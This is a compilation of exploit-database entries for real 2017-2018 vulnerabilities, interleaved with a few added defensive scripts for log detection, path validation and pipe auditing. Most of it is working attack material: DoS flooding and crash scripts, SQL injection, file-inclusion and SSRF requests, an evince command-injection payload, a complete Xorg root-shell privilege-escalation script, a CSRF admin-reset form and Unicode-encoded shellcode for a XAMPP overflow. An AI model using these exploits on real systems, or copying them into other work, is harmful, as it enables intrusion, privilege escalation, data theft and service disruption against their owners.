# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://cesanta.com/binary.html
# Software Link: https://backend.cesanta.com/cgi-bin/api.cgi?act=dl&os=win
# Version: 6.9
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)

#!/usr/bin/python
import socket

print """
         \\\|///
       \\  - -  //
        (  @ @ )
 ----oOOo--(_)-oOOo----
Mongoose Web Server 6.9
    Ihsan Sencan
 ---------------Ooooo----
                (   )
       ooooO     ) /
       (   )    (_/
        \ (
         \_)
"""
Ip = raw_input("[Ip]: ")
Port = 8080 # Default port
 
d=[]
c=0
while 1:
    try:
        d.append(socket.create_connection((Ip,Port)))
        d[c].send("BOOM")
        print "Sie!"
        c+=1
    except socket.error: 
        print "Done!"
        raw_input()
        break
            
# Exploit Title: D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery
# Author: John Page (aka hyp3rlinx)
# Date: 2018-11-09
# Vendor: http://us.dlink.com
# Product Link: http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/
# Version: Version 1.03 r0098
# CVE: N/A
# References:

# [Security Issue]
# Using a web browser or script, SSRF can be initiated against internal/external systems 
# to conduct port scans by leveraging D-LINK's MailConnect component.

# The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended 
# to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, 
# leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI.
# This can undermine accountability of where scans or connections actually came from and/or bypass 
# the firewall etc. This can be automated via script or using a web browser.

# [Exploit/POC]
https://VICTIM-IP/index.php/System/MailConnect/host/port/secure/

reply: OK

#Scan internal port 22 SSH:

https://VICTIM-IP/index.php/System/MailConnect/host/VICTIM-IP/port/22/secure/
reply: OK
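Detection logic for the MailConnect URI format described above, as an added example that is not part of the advisory or of D-Link's software: it parses web access-log lines, extracts the host and port from the URI, and flags targets that do not look like an SMTP connectivity test. The log lines are constructed, and the SMTP port set, the sweep threshold and the function names are assumptions.

```python
import ipaddress
import re
from collections import defaultdict

SMTP_PORTS = frozenset({25, 465, 587})  # ports a mail connectivity test plausibly needs
MAILCONNECT_RE = re.compile(
    r'"(?:GET|POST) \S*/index\.php/System/MailConnect'
    r'/host/(?P<host>[^/\s]*)/port/(?P<port>[^/\s]*)/secure/')

# Constructed access-log lines (common log format), documentation address ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [09/Nov/2018:10:00:01 +0000] "GET /index.php/System/MailConnect/host/192.0.2.25/port/25/secure/ HTTP/1.1" 200 2
198.51.100.9 - - [09/Nov/2018:10:02:11 +0000] "GET /index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ HTTP/1.1" 200 2
198.51.100.9 - - [09/Nov/2018:10:02:12 +0000] "GET /index.php/System/MailConnect/host/127.0.0.1/port/3306/secure/ HTTP/1.1" 200 2
198.51.100.9 - - [09/Nov/2018:10:02:13 +0000] "GET /index.php/System/MailConnect/host/10.0.0.5/port/445/secure/ HTTP/1.1" 200 2
198.51.100.7 - - [09/Nov/2018:10:05:00 +0000] "GET /index.php/Login HTTP/1.1" 200 512
"""


def classify(host, port_text):
    """Return the reasons a MailConnect target looks like SSRF, empty if none."""
    reasons = []
    if not port_text.isdigit() or int(port_text) not in SMTP_PORTS:
        reasons.append("non-smtp-port")
    try:
        addr = ipaddress.ip_address(host)
        if addr.is_loopback or addr.is_link_local:
            reasons.append("local-address")
    except ValueError:
        pass  # a hostname: only the port check applies
    return reasons


def scan(log_text):
    """Return (findings, per-client set of flagged (host, port) targets)."""
    findings, per_client = [], defaultdict(set)
    for line in log_text.splitlines():
        match = MAILCONNECT_RE.search(line)
        if not match:
            continue
        client = line.split(" ", 1)[0]
        reasons = classify(match["host"], match["port"])
        if reasons:
            findings.append((client, match["host"], match["port"], reasons))
            per_client[client].add((match["host"], match["port"]))
    return findings, dict(per_client)


def sweeping_clients(per_client, threshold=3):
    """Clients that probed at least `threshold` distinct flagged targets."""
    return sorted(c for c, targets in per_client.items() if len(targets) >= threshold)


if __name__ == "__main__":
    found, clients = scan(SAMPLE_LOG)
    for item in found:
        print(item)
    print("port sweep suspected from:", sweeping_clients(clients))
```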
            
# Exploit Title: Alienor Web Libre 2.0 - SQL Injection
# Dork: N/A
# Date: 2018-11-08
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://alienor.org/
# Software Link: https://excellmedia.dl.sourceforge.net/project/alienorweblibre/alienorweblibre.zip
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php
# 
POST /[PATH]/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=aehrspv1bfhbp1iqhkl1107vd7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 306
identifiant=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&mot_de_passe=&inventaire=Inventaire
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2018 22:07:19 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 81
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
            
# Exploit Title: Surreal ToDo 0.6.1.2 - Local File Inclusion
# Dork: N/A
# Date: 2018-11-08
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://getsurreal.com/surrealtodo
# Software Link: https://netcologne.dl.sourceforge.net/project/surrealtodo/Surreal%20ToDo/surrealtodo_v0.6.1.2.zip
# Version: 0.6.1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php?content=[FILE]
# 
GET /[PATH]/index.php?content=../../../../Windows/win.ini HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 07 Nov 2018 23:58:36 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1885
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
            
# Exploit Title: evince command line injection
# Date: 2017-09-05
# Exploit Author: Matlink
# Vendor Homepage: https://wiki.gnome.org/Apps/Evince
# Software Link: https://wiki.gnome.org/Apps/Evince
# Version: 3.24.0
# Tested on: Debian sid
# CVE : CVE-2017-1000083

Can be tested on docker with https://github.com/matlink/evince-cve-2017-1000083

#! /bin/bash

# define the payload
export PAYLOAD="firefox google.com"

# Create the malicious .cbt file
dd if=/dev/zero of=" --checkpoint-action=exec=bash -c '$PAYLOAD;'.jpg" bs=1 count=512000
tar cvf poc.cbt *.jpg

# Run the malicious file
evince poc.cbt
            
# Exploit Title: Surreal ToDo 0.6.1.2 - SQL Injection
# Dork: N/A
# Date: 2018-11-08
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://getsurreal.com/surrealtodo
# Software Link: https://netcologne.dl.sourceforge.net/project/surrealtodo/Surreal%20ToDo/surrealtodo_v0.6.1.2.zip
# Version: 0.6.1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/ajax.php?action=lists&page_id=[SQL]
# 
GET /[PATH]/ajax.php?action=lists&page_id=1%20AND%201=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 07 Nov 2018 23:41:43 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1783
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/search=[SQL]
# 
GET /[PATH]/?search=%27%20AND%201=1%20AND%20%27Efe%27%20LIKE%20%27Efe HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 07 Nov 2018 23:44:26 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 5284
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
            
# Exploit Title: CuteFTP Mac 3.1 Denial of Service (PoC)
# Date: 2018-11-06
# Exploit Author: Yair Rodríguez Aparicio
# Vendor Homepage: https://www.globalscape.com/cuteftp
# Software Link: http://go.globalscape.com/download/cuteftp-macosx
# Version: 3.1
# Tested on: macOS High Sierra 10.13

# Steps to Produce the Crash:
# 1.- Run python code : python cute.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open CuteFTP Mac
# 4.- Click on "Quick Connect"
# 5.- Paste clipboard on "Host", "User", "Password" and "Port"
# 6.- Click on "Run"
# 7.- Crashed!



buffer = "\x41" * 2000
f = open("text.txt", "w")
f.write(buffer)
f.close()
            
# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7)
# Date: 2018-11-07
# Exploit Author: @bolonobolo
# Vendor Homepage: https://www.x.org/
# Version: 1.19.5
# Tested on: RHEL 7.3 && 7.5
# CVE : CVE-2018-14665
# Explanation
# The only condition that has to be met for this PE to work via SSH is that the legitimate non-root user 
# has to be logged in through the console at the moment the PE script is launched.
# In fact during the logged in session of the legitimate non-root user, 
# a file with the name of the non-root user will be created in the /var/run/console folder. 
# With that file present, the same non-root user can launch a Xorg command via SSH. 
# 
# Usage: $ python poc.py
# $ python poc.py 
# [*] Waiting for bolo to connect to the console
# [*] OK --> bolo console opened
# [*] Building root shell wait 2 minutes
# [*] crontab overwritten
# 
# ... cut Xorg output ...
# 
# [*] Xorg killed
# (II) Server terminated successfully (0). Closing log file.
# [*] Don't forget to cleanup /etc/crontab and /tmp dir
# sh-4.2# id && whoami
# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo)
# root
# sh-4.2#


#!/usr/bin/python
import os
import getpass
import subprocess

userList = []
path="/var/run/console/"

def getWhoami():
	return getpass.getuser()

def getConsole(path):
	p = subprocess.Popen(["ls", path], stdout=subprocess.PIPE)
	(console, err) = p.communicate()
	consoleList = str.splitlines(console)
	return consoleList

def payload():
	f = open("/tmp/payload", "w")
	payload = ("cp /bin/sh /usr/local/bin/shell\n" 
			"echo \"#include <stdio.h> \" > /tmp/shell.c\n"
   			"echo \"#include <stdlib.h>\" >> /tmp/shell.c\n"
   			"echo \"#include <sys/types.h>\" >> /tmp/shell.c\n"
   			"echo \"#include <unistd.h>\" >> /tmp/shell.c\n"
			"echo 'int main(){setuid(0);setgid(0);system(\"/bin/sh\");}' >> /tmp/shell.c\n"
			"gcc /tmp/shell.c -o /usr/local/bin/shell\n"
			"chmod 4777 /usr/local/bin/shell\n")
	f.write(payload)	
	
def executePayload():	
	os.system("chmod +x /tmp/payload")
	os.system("cd /etc; Xorg -fp \"* * * * * root /tmp/payload\" -logfile crontab :1 &")
	print "[*] crontab overwritten"
	os.system("sleep 5")
	os.system("pkill Xorg")
	print "[*] Xorg killed"
	os.system("sleep 120")
	return

def main():
	whoami = getWhoami()
	print "[*] Waiting for " + whoami + " to connect to the console"
	i = 0
	while (i == 0):
		consoleList = getConsole(path)
		for user in consoleList:
			if user == whoami :
				print "[*] OK --> " + user + " console opened"
				i = 1
	print "[*] Building root shell wait 2 minutes"
	payload()
	executePayload()
	print "[*] Don't forget to cleanup /etc/crontab and /tmp dir"
	os.system("/usr/local/bin/shell")			

if __name__ == '__main__':
	main()
            
# Exploit Title: Musicco 2.0.0 - Arbitrary Directory Download
# Dork: N/A
# Date: 2018-11-09
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.musicco.app/
# Software Link: https://codeload.github.com/micser/musicco/zip/master
# Version: 2.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/?getAlbum&parent=[Directory]&album=Efe 

# /[PATH]/index.php
#3592 	} elseif (isset($_GET['getAlbum'])) {
#3593 			$parent = $_GET['parent'];
#3594 			$album = $_GET['album'];
#3595 			$rootPath = realpath($parent);
#3596 			$zip = new ZipArchive();
#3597 			$zip->open('./'.Musicco::getConfig('tempFolder').'/'.$album.'.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE);

GET /[PATH]/?getAlbum&parent=../../../../Efe_S1/apache/conf&album=Efe HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 09 Nov 2018 14:24:42 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: musicco=rlparl6g67tsok72of1ln5tj23; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Disposition: attachment;filename="Efe.zip"
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/zip, application/octet-stream
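
The quoted `index.php` lines pass `parent` straight to `realpath()` and build the archive name from `album`, and they show no check that either stays inside the music library. The missing containment check, sketched in Python as an added example (not Musicco's code; the function names and the temporary directory layout are assumptions made here):

```python
import os
import re
import tempfile


class RejectedRequest(ValueError):
    """Raised when a request parameter fails validation."""


def resolve_album_dir(library_root, parent):
    """Resolve `parent` and return it only if it is a directory inside the library."""
    root = os.path.realpath(library_root)
    # realpath() collapses ../ sequences and follows symlinks, like PHP's realpath().
    candidate = os.path.realpath(os.path.join(root, parent))
    try:
        inside = os.path.commonpath([root, candidate]) == root
    except ValueError:  # e.g. paths on different Windows drives
        inside = False
    if not inside:
        raise RejectedRequest("parent resolves outside the music library")
    if not os.path.isdir(candidate):
        raise RejectedRequest("parent is not a directory")
    return candidate


_ALBUM_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9 _.-]{0,63}")


def is_allowed_album(album):
    """True if `album` is safe to use as a file name (no separators, no leading dot)."""
    return _ALBUM_NAME.fullmatch(album) is not None


def archive_name(album):
    """Return the zip file name for `album`, or raise RejectedRequest."""
    if not is_allowed_album(album):
        raise RejectedRequest("album contains characters not allowed in a file name")
    return album + ".zip"


def demo():
    """Run the page's request value and three other cases against a constructed tree."""
    with tempfile.TemporaryDirectory() as base:
        library = os.path.join(base, "library")
        os.makedirs(os.path.join(library, "Artist", "Album"))
        os.makedirs(os.path.join(base, "conf"))
        # Edge case: a symlink inside the library that points outside it.
        os.symlink(os.path.join(base, "conf"), os.path.join(library, "escape"))
        cases = {
            "album folder": "Artist/Album",
            "page request": "../../../../Efe_S1/apache/conf",
            "symlink": "escape",
            "absolute path": os.path.join(base, "conf"),
        }
        results = {}
        for label, parent in cases.items():
            try:
                resolve_album_dir(library, parent)
                results[label] = "ok"
            except RejectedRequest:
                results[label] = "rejected"
        return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(label, "->", outcome)
    print(archive_name("Efe"))
```
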
            
/*
[+] Credits: John Page (aka hyp3rlinx)		
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/CISCO-IMMUNET-AND-CISCO-AMP-FOR-ENDPOINTS-SYSTEM-SCAN-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec


***Greetz: indoushka | Eduardo B.***


[Vendor]
www.cisco.com


[Multiple Products]
Cisco Immunet < v6.2.0 and Cisco AMP For Endpoints v6.2.0


Cisco Immunet is a free, cloud-based, community-driven antivirus application, using the ClamAV and its own engine.
The software is complementary with existing antivirus software.

Cisco AMP (Advanced Malware Protection)
Advanced Malware Protection (AMP) goes beyond point-in-time capabilities and is built to protect organizations before, during, and after an attack. 


[Vulnerability Type]
System Scan Denial of Service


[CVE Reference]
CVE-2018-15437

Cisco Advisory ID: cisco-sa-20181107-imm-dos
Cisco Bug ID: CSCvk70945
Cisco Bug ID: CSCvn05551


CVSS Score:
Base 5.5 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:X/RL:X/RC:X


[Security Issue]
A vulnerability in the system scanning component of Cisco Immunet and Cisco Advanced Malware Protection (AMP) for Endpoints running on
Microsoft Windows could allow a local attacker to disable the scanning functionality of the product.

This could allow executable files to be launched on the system without being analyzed for threats.
The vulnerability is due to improper process resource handling.

An attacker could exploit this vulnerability by gaining local access to a system running Microsoft Windows and protected by Cisco Immunet or 
Cisco AMP for Endpoints and executing a malicious file.

A successful exploit could allow the attacker to prevent the scanning services from functioning properly and ultimately prevent the system from
being protected from further intrusion.

There are no workarounds that address this vulnerability.

Issue is due to a NULL DACL (RW Everyone) resulting in a system scan Denial Of Service vulnerability for both of these endpoint protection programs.

The affected end user will get pop up warning box when attempting to perform a file or system scan,

"You Can Not Scan at This Time

"The Immunet service is not running.

Please restart the service and retry."

Below I provide details to exploit Cisco Immunet, however "Cisco AMP For Endpoints" is also affected so the exploit can easily be ported.

[References]
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181107-imm-dos


[Vulnerability Details]
Pipe is remotely accessible: PIPE_REJECT_REMOTE_CLIENTS not present.

FILE_FLAG_FIRST_PIPE_INSTANCE not present.

Max Pipe Instances = FF (255)

loc_140028140:

lea     rax, [rbp+57h+pSecurityDescriptor]
mov     [rbp+57h+SecurityAttributes.nLength], 18h
mov     edx, 1          ; dwRevision
mov     [rbp+57h+SecurityAttributes.lpSecurityDescriptor], rax
lea     rcx, [rbp+57h+pSecurityDescriptor] ; pSecurityDescriptor
mov     [rbp+57h+SecurityAttributes.bInheritHandle], 1
call    cs:InitializeSecurityDescriptor
xor     r9d, r9d        ; bDaclDefaulted
lea     rcx, [rbp+57h+pSecurityDescriptor] ; pSecurityDescriptor
xor     r8d, r8d        ; pDacl
lea     edx, [r9+1]     ; bDaclPresent
call    cs:SetSecurityDescriptorDacl
mov     rcx, [rdi+18h]  ; lpName
lea     rax, [rbp+57h+SecurityAttributes]
mov     [rsp+100h+lpSecurityAttributes], rax ; lpSecurityAttributes
mov     edx, 40000003h  ; dwOpenMode
mov     [rsp+100h+nDefaultTimeOut], esi ; nDefaultTimeOut
mov     r9d, 0FFh       ; nMaxInstances
mov     [rsp+100h+nInBufferSize], 2000h ; nInBufferSize
mov     r8d, 6          ; dwPipeMode
mov     [rsp+100h+nOutBufferSize], 2000h ; nOutBufferSize
call    cs:CreateNamedPipeW
mov     [rdi+8], rax
call    cs:GetLastError
test    eax, eax
jz      short loc_140028203
 

 
[Exploit/POC]

"Cisco-Immunet-Exploit.c"
*/

#include <windows.h> 
#include <stdio.h>
#define pipename "\\\\.\\pipe\\IMMUNET_SCAN" 

/* Discovered by hyp3rlinx
   CVE-2018-15437  */
 
int main(void) { 

    while (TRUE){

        HANDLE pipe = CreateNamedPipe(pipename, PIPE_ACCESS_INBOUND | PIPE_ACCESS_OUTBOUND , PIPE_WAIT, 1, 1024, 1024, 120 * 1000, NULL); 

        if (pipe == INVALID_HANDLE_VALUE){

           printf("Error: %d", GetLastError());

        }else{

        printf("%s","pipe created\n");

        printf("%x",pipe);

        }

        ConnectNamedPipe(pipe, NULL);

         if(ImpersonateNamedPipeClient(pipe)){  

          printf("ok!");

        }else{

        printf("%s%d","WTF",GetLastError());

        } 

        CloseHandle(pipe);

    }

  return 0; 

}

/*
[Network Access]
Local / Remote



[Severity]
High



Disclosure Timeline
=============================
Vendor Notification: August 7, 2018
Vendor acknowledgement: August 7, 2018
Vendor released fixes: November 7th, 2018
November 8, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
*/
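
The settings the Cisco advisory lists under Vulnerability Details can be read directly from the immediates in its listing. This added example (not part of the advisory or of Cisco's code) replays the argument set-up with a small constant tracker and reports the weak settings; `call_arguments`, `audit` and the finding codes are names chosen here, and the hardened listing is constructed for contrast.

```python
import re

# Win32 values from winbase.h
FILE_FLAG_FIRST_PIPE_INSTANCE = 0x00080000
PIPE_REJECT_REMOTE_CLIENTS = 0x00000008
PIPE_UNLIMITED_INSTANCES = 255

# Argument set-up lines copied from the advisory's listing.
ADVISORY_LISTING = """\
xor     r9d, r9d        ; bDaclDefaulted
lea     rcx, [rbp+57h+pSecurityDescriptor] ; pSecurityDescriptor
xor     r8d, r8d        ; pDacl
lea     edx, [r9+1]     ; bDaclPresent
call    cs:SetSecurityDescriptorDacl
mov     rcx, [rdi+18h]  ; lpName
mov     edx, 40000003h  ; dwOpenMode
mov     r9d, 0FFh       ; nMaxInstances
mov     [rsp+100h+nInBufferSize], 2000h ; nInBufferSize
mov     r8d, 6          ; dwPipeMode
call    cs:CreateNamedPipeW
"""

# Constructed counter-example: a real ACL pointer, the first-instance flag,
# remote clients rejected and a single pipe instance.
HARDENED_LISTING = """\
xor     r9d, r9d        ; bDaclDefaulted
lea     r8, [rbp+57h+Acl] ; pDacl
lea     edx, [r9+1]     ; bDaclPresent
call    cs:SetSecurityDescriptorDacl
mov     edx, 40080003h  ; dwOpenMode
mov     r9d, 1          ; nMaxInstances
mov     r8d, 0Eh        ; dwPipeMode
call    cs:CreateNamedPipeW
"""

_WIDE = {"eax": "rax", "ecx": "rcx", "edx": "rdx", "r8d": "r8", "r9d": "r9"}


def _wide(name):
    """Map a 32-bit register name to its 64-bit parent."""
    return _WIDE.get(name, name)


def _imm(token):
    """IDA-style immediate ('0FFh', '40000003h', '6') -> int, otherwise None."""
    if re.fullmatch(r"\d[0-9A-Fa-f]*h", token):
        return int(token[:-1], 16)
    return int(token) if token.isdigit() else None


def call_arguments(listing):
    """Map each called API to the constant arguments set up before the call."""
    regs, args, calls = {}, {}, {}
    for line in listing.splitlines():
        code, _, note = line.partition(";")
        fields = code.split(None, 1)
        if len(fields) < 2:
            continue
        op, operands = fields[0], [o.strip() for o in fields[1].split(",", 1)]
        if op == "call":
            calls[operands[0].split(":")[-1]] = args
            regs, args = {}, {}              # argument registers are volatile
            continue
        if len(operands) != 2:
            continue
        dst, src = _wide(operands[0]), operands[1]
        value = None
        if op == "xor" and _wide(src) == dst:
            value = 0                        # xor reg, reg zeroes the register
        elif op == "mov":
            value = _imm(src)
        elif op == "lea":                    # lea reg, [base+imm] with a known base
            m = re.fullmatch(r"\[(\w+)\+(\w+)\]", src)
            if m:
                base, offset = regs.get(_wide(m.group(1))), _imm(m.group(2))
                if base is not None and offset is not None:
                    value = base + offset
        regs[dst] = value
        if note.strip() and value is not None:
            args[note.strip()] = value       # the IDA comment names the parameter
    return calls


def audit(calls):
    """Return finding codes for the pipe set-up described by `calls`."""
    findings = []
    dacl = calls.get("SetSecurityDescriptorDacl", {})
    if dacl.get("bDaclPresent") == 1 and dacl.get("pDacl") == 0:
        findings.append("null-dacl")                 # DACL present but NULL: full access for everyone
    pipe = calls.get("CreateNamedPipeW")
    if pipe:
        if not pipe.get("dwOpenMode", 0) & FILE_FLAG_FIRST_PIPE_INSTANCE:
            findings.append("no-first-pipe-instance")  # creation succeeds even if the name already exists
        if not pipe.get("dwPipeMode", 0) & PIPE_REJECT_REMOTE_CLIENTS:
            findings.append("remote-clients-accepted")
        if pipe.get("nMaxInstances") == PIPE_UNLIMITED_INSTANCES:
            findings.append("unlimited-instances")
    return findings


if __name__ == "__main__":
    print(audit(call_arguments(ADVISORY_LISTING)))
    print(audit(call_arguments(HARDENED_LISTING)))
```
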
            
# Exploit Title: Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 2018-11-09
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/datacenteraudit/
# Software Link: https://netix.dl.sourceforge.net/project/datacenteraudit/data_center_audit_v262.zip
# Version: 2.6.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/dca_resetpw.php
# 
POST /[PATH]/dca_resetpw.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
updateuser=admin&pass=efe&pass2=efe&submit_reset=VerAyari
HTTP/1.1 200 OK
Date: Fri, 09 Nov 2018 12:47:37 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 842
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/dca_resetpw.php
# 
<html>
<body>
<form action="http://localhost/[PATH]/dca_resetpw.php" method="post">
Username:admin
<input name="updateuser" value="admin" type="hidden">
New Password:
<input name="pass" maxlength="10" type="password">
Confirm Password:
<input name="pass2" maxlength="10" type="password">
<input name="submit_reset" value="Change Password" type="submit">
</form>
</body>
</html>
            
# Exploit Title: XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)
# Exploit Author: Gionathan "John" Reale (0-day DoS exploit), Semen Alexandrovich Lyhin (1-day fully working exploit).
# Shellcode Author: Giuseppe D'Amore (EDB:28996)
# Date: 2018-11-08.
# Software: XAMPP 
# Version: 3.2.2 / 7.2.9 (Newest version at time of writing)
# Download: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/7.2.9/xampp-portable-win32-7.2.9-0-VC15-installer.exe/download
# Tested on: Windows 10 64bit with XAMPP 32bit. Should work on any Windows since XP. 

# Special thanks to Deloitte Ukraine for providing a few paid hours to create this exploit. 

# Steps to Reproduce: 
# Run the python exploit script, it will create a new file with the name "exploit.txt".
# Copy the contents of "exploit.txt" 
# Start the program and click "Config (Top Right With Symbol)"
# Paste the contents of "exploit.txt" into the following field: "Editor".
# Click "Save" and then in the main window Click "Config" > "Apache (httpd.conf)". 
# You will see that arbitrary code is executed. It should pop a messagebox. 

#cat 28996.bin | msfvenom -p - -a x86 --platform win -f py  -e x86/unicode_mixed BufferRegister=EAX
#Length is 352, but double it.

buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x50\x31\x4a\x32\x68\x32"
buf += "\x50\x30\x61\x54\x34\x4b\x4a\x72\x74\x4b\x72\x32\x6a"
buf += "\x6c\x44\x4b\x4e\x72\x4d\x4c\x62\x6b\x4d\x72\x79\x78"
buf += "\x62\x6b\x31\x62\x4d\x50\x34\x4b\x4b\x62\x31\x70\x51"
buf += "\x6e\x6a\x6c\x50\x33\x62\x55\x68\x72\x75\x39\x69\x37"
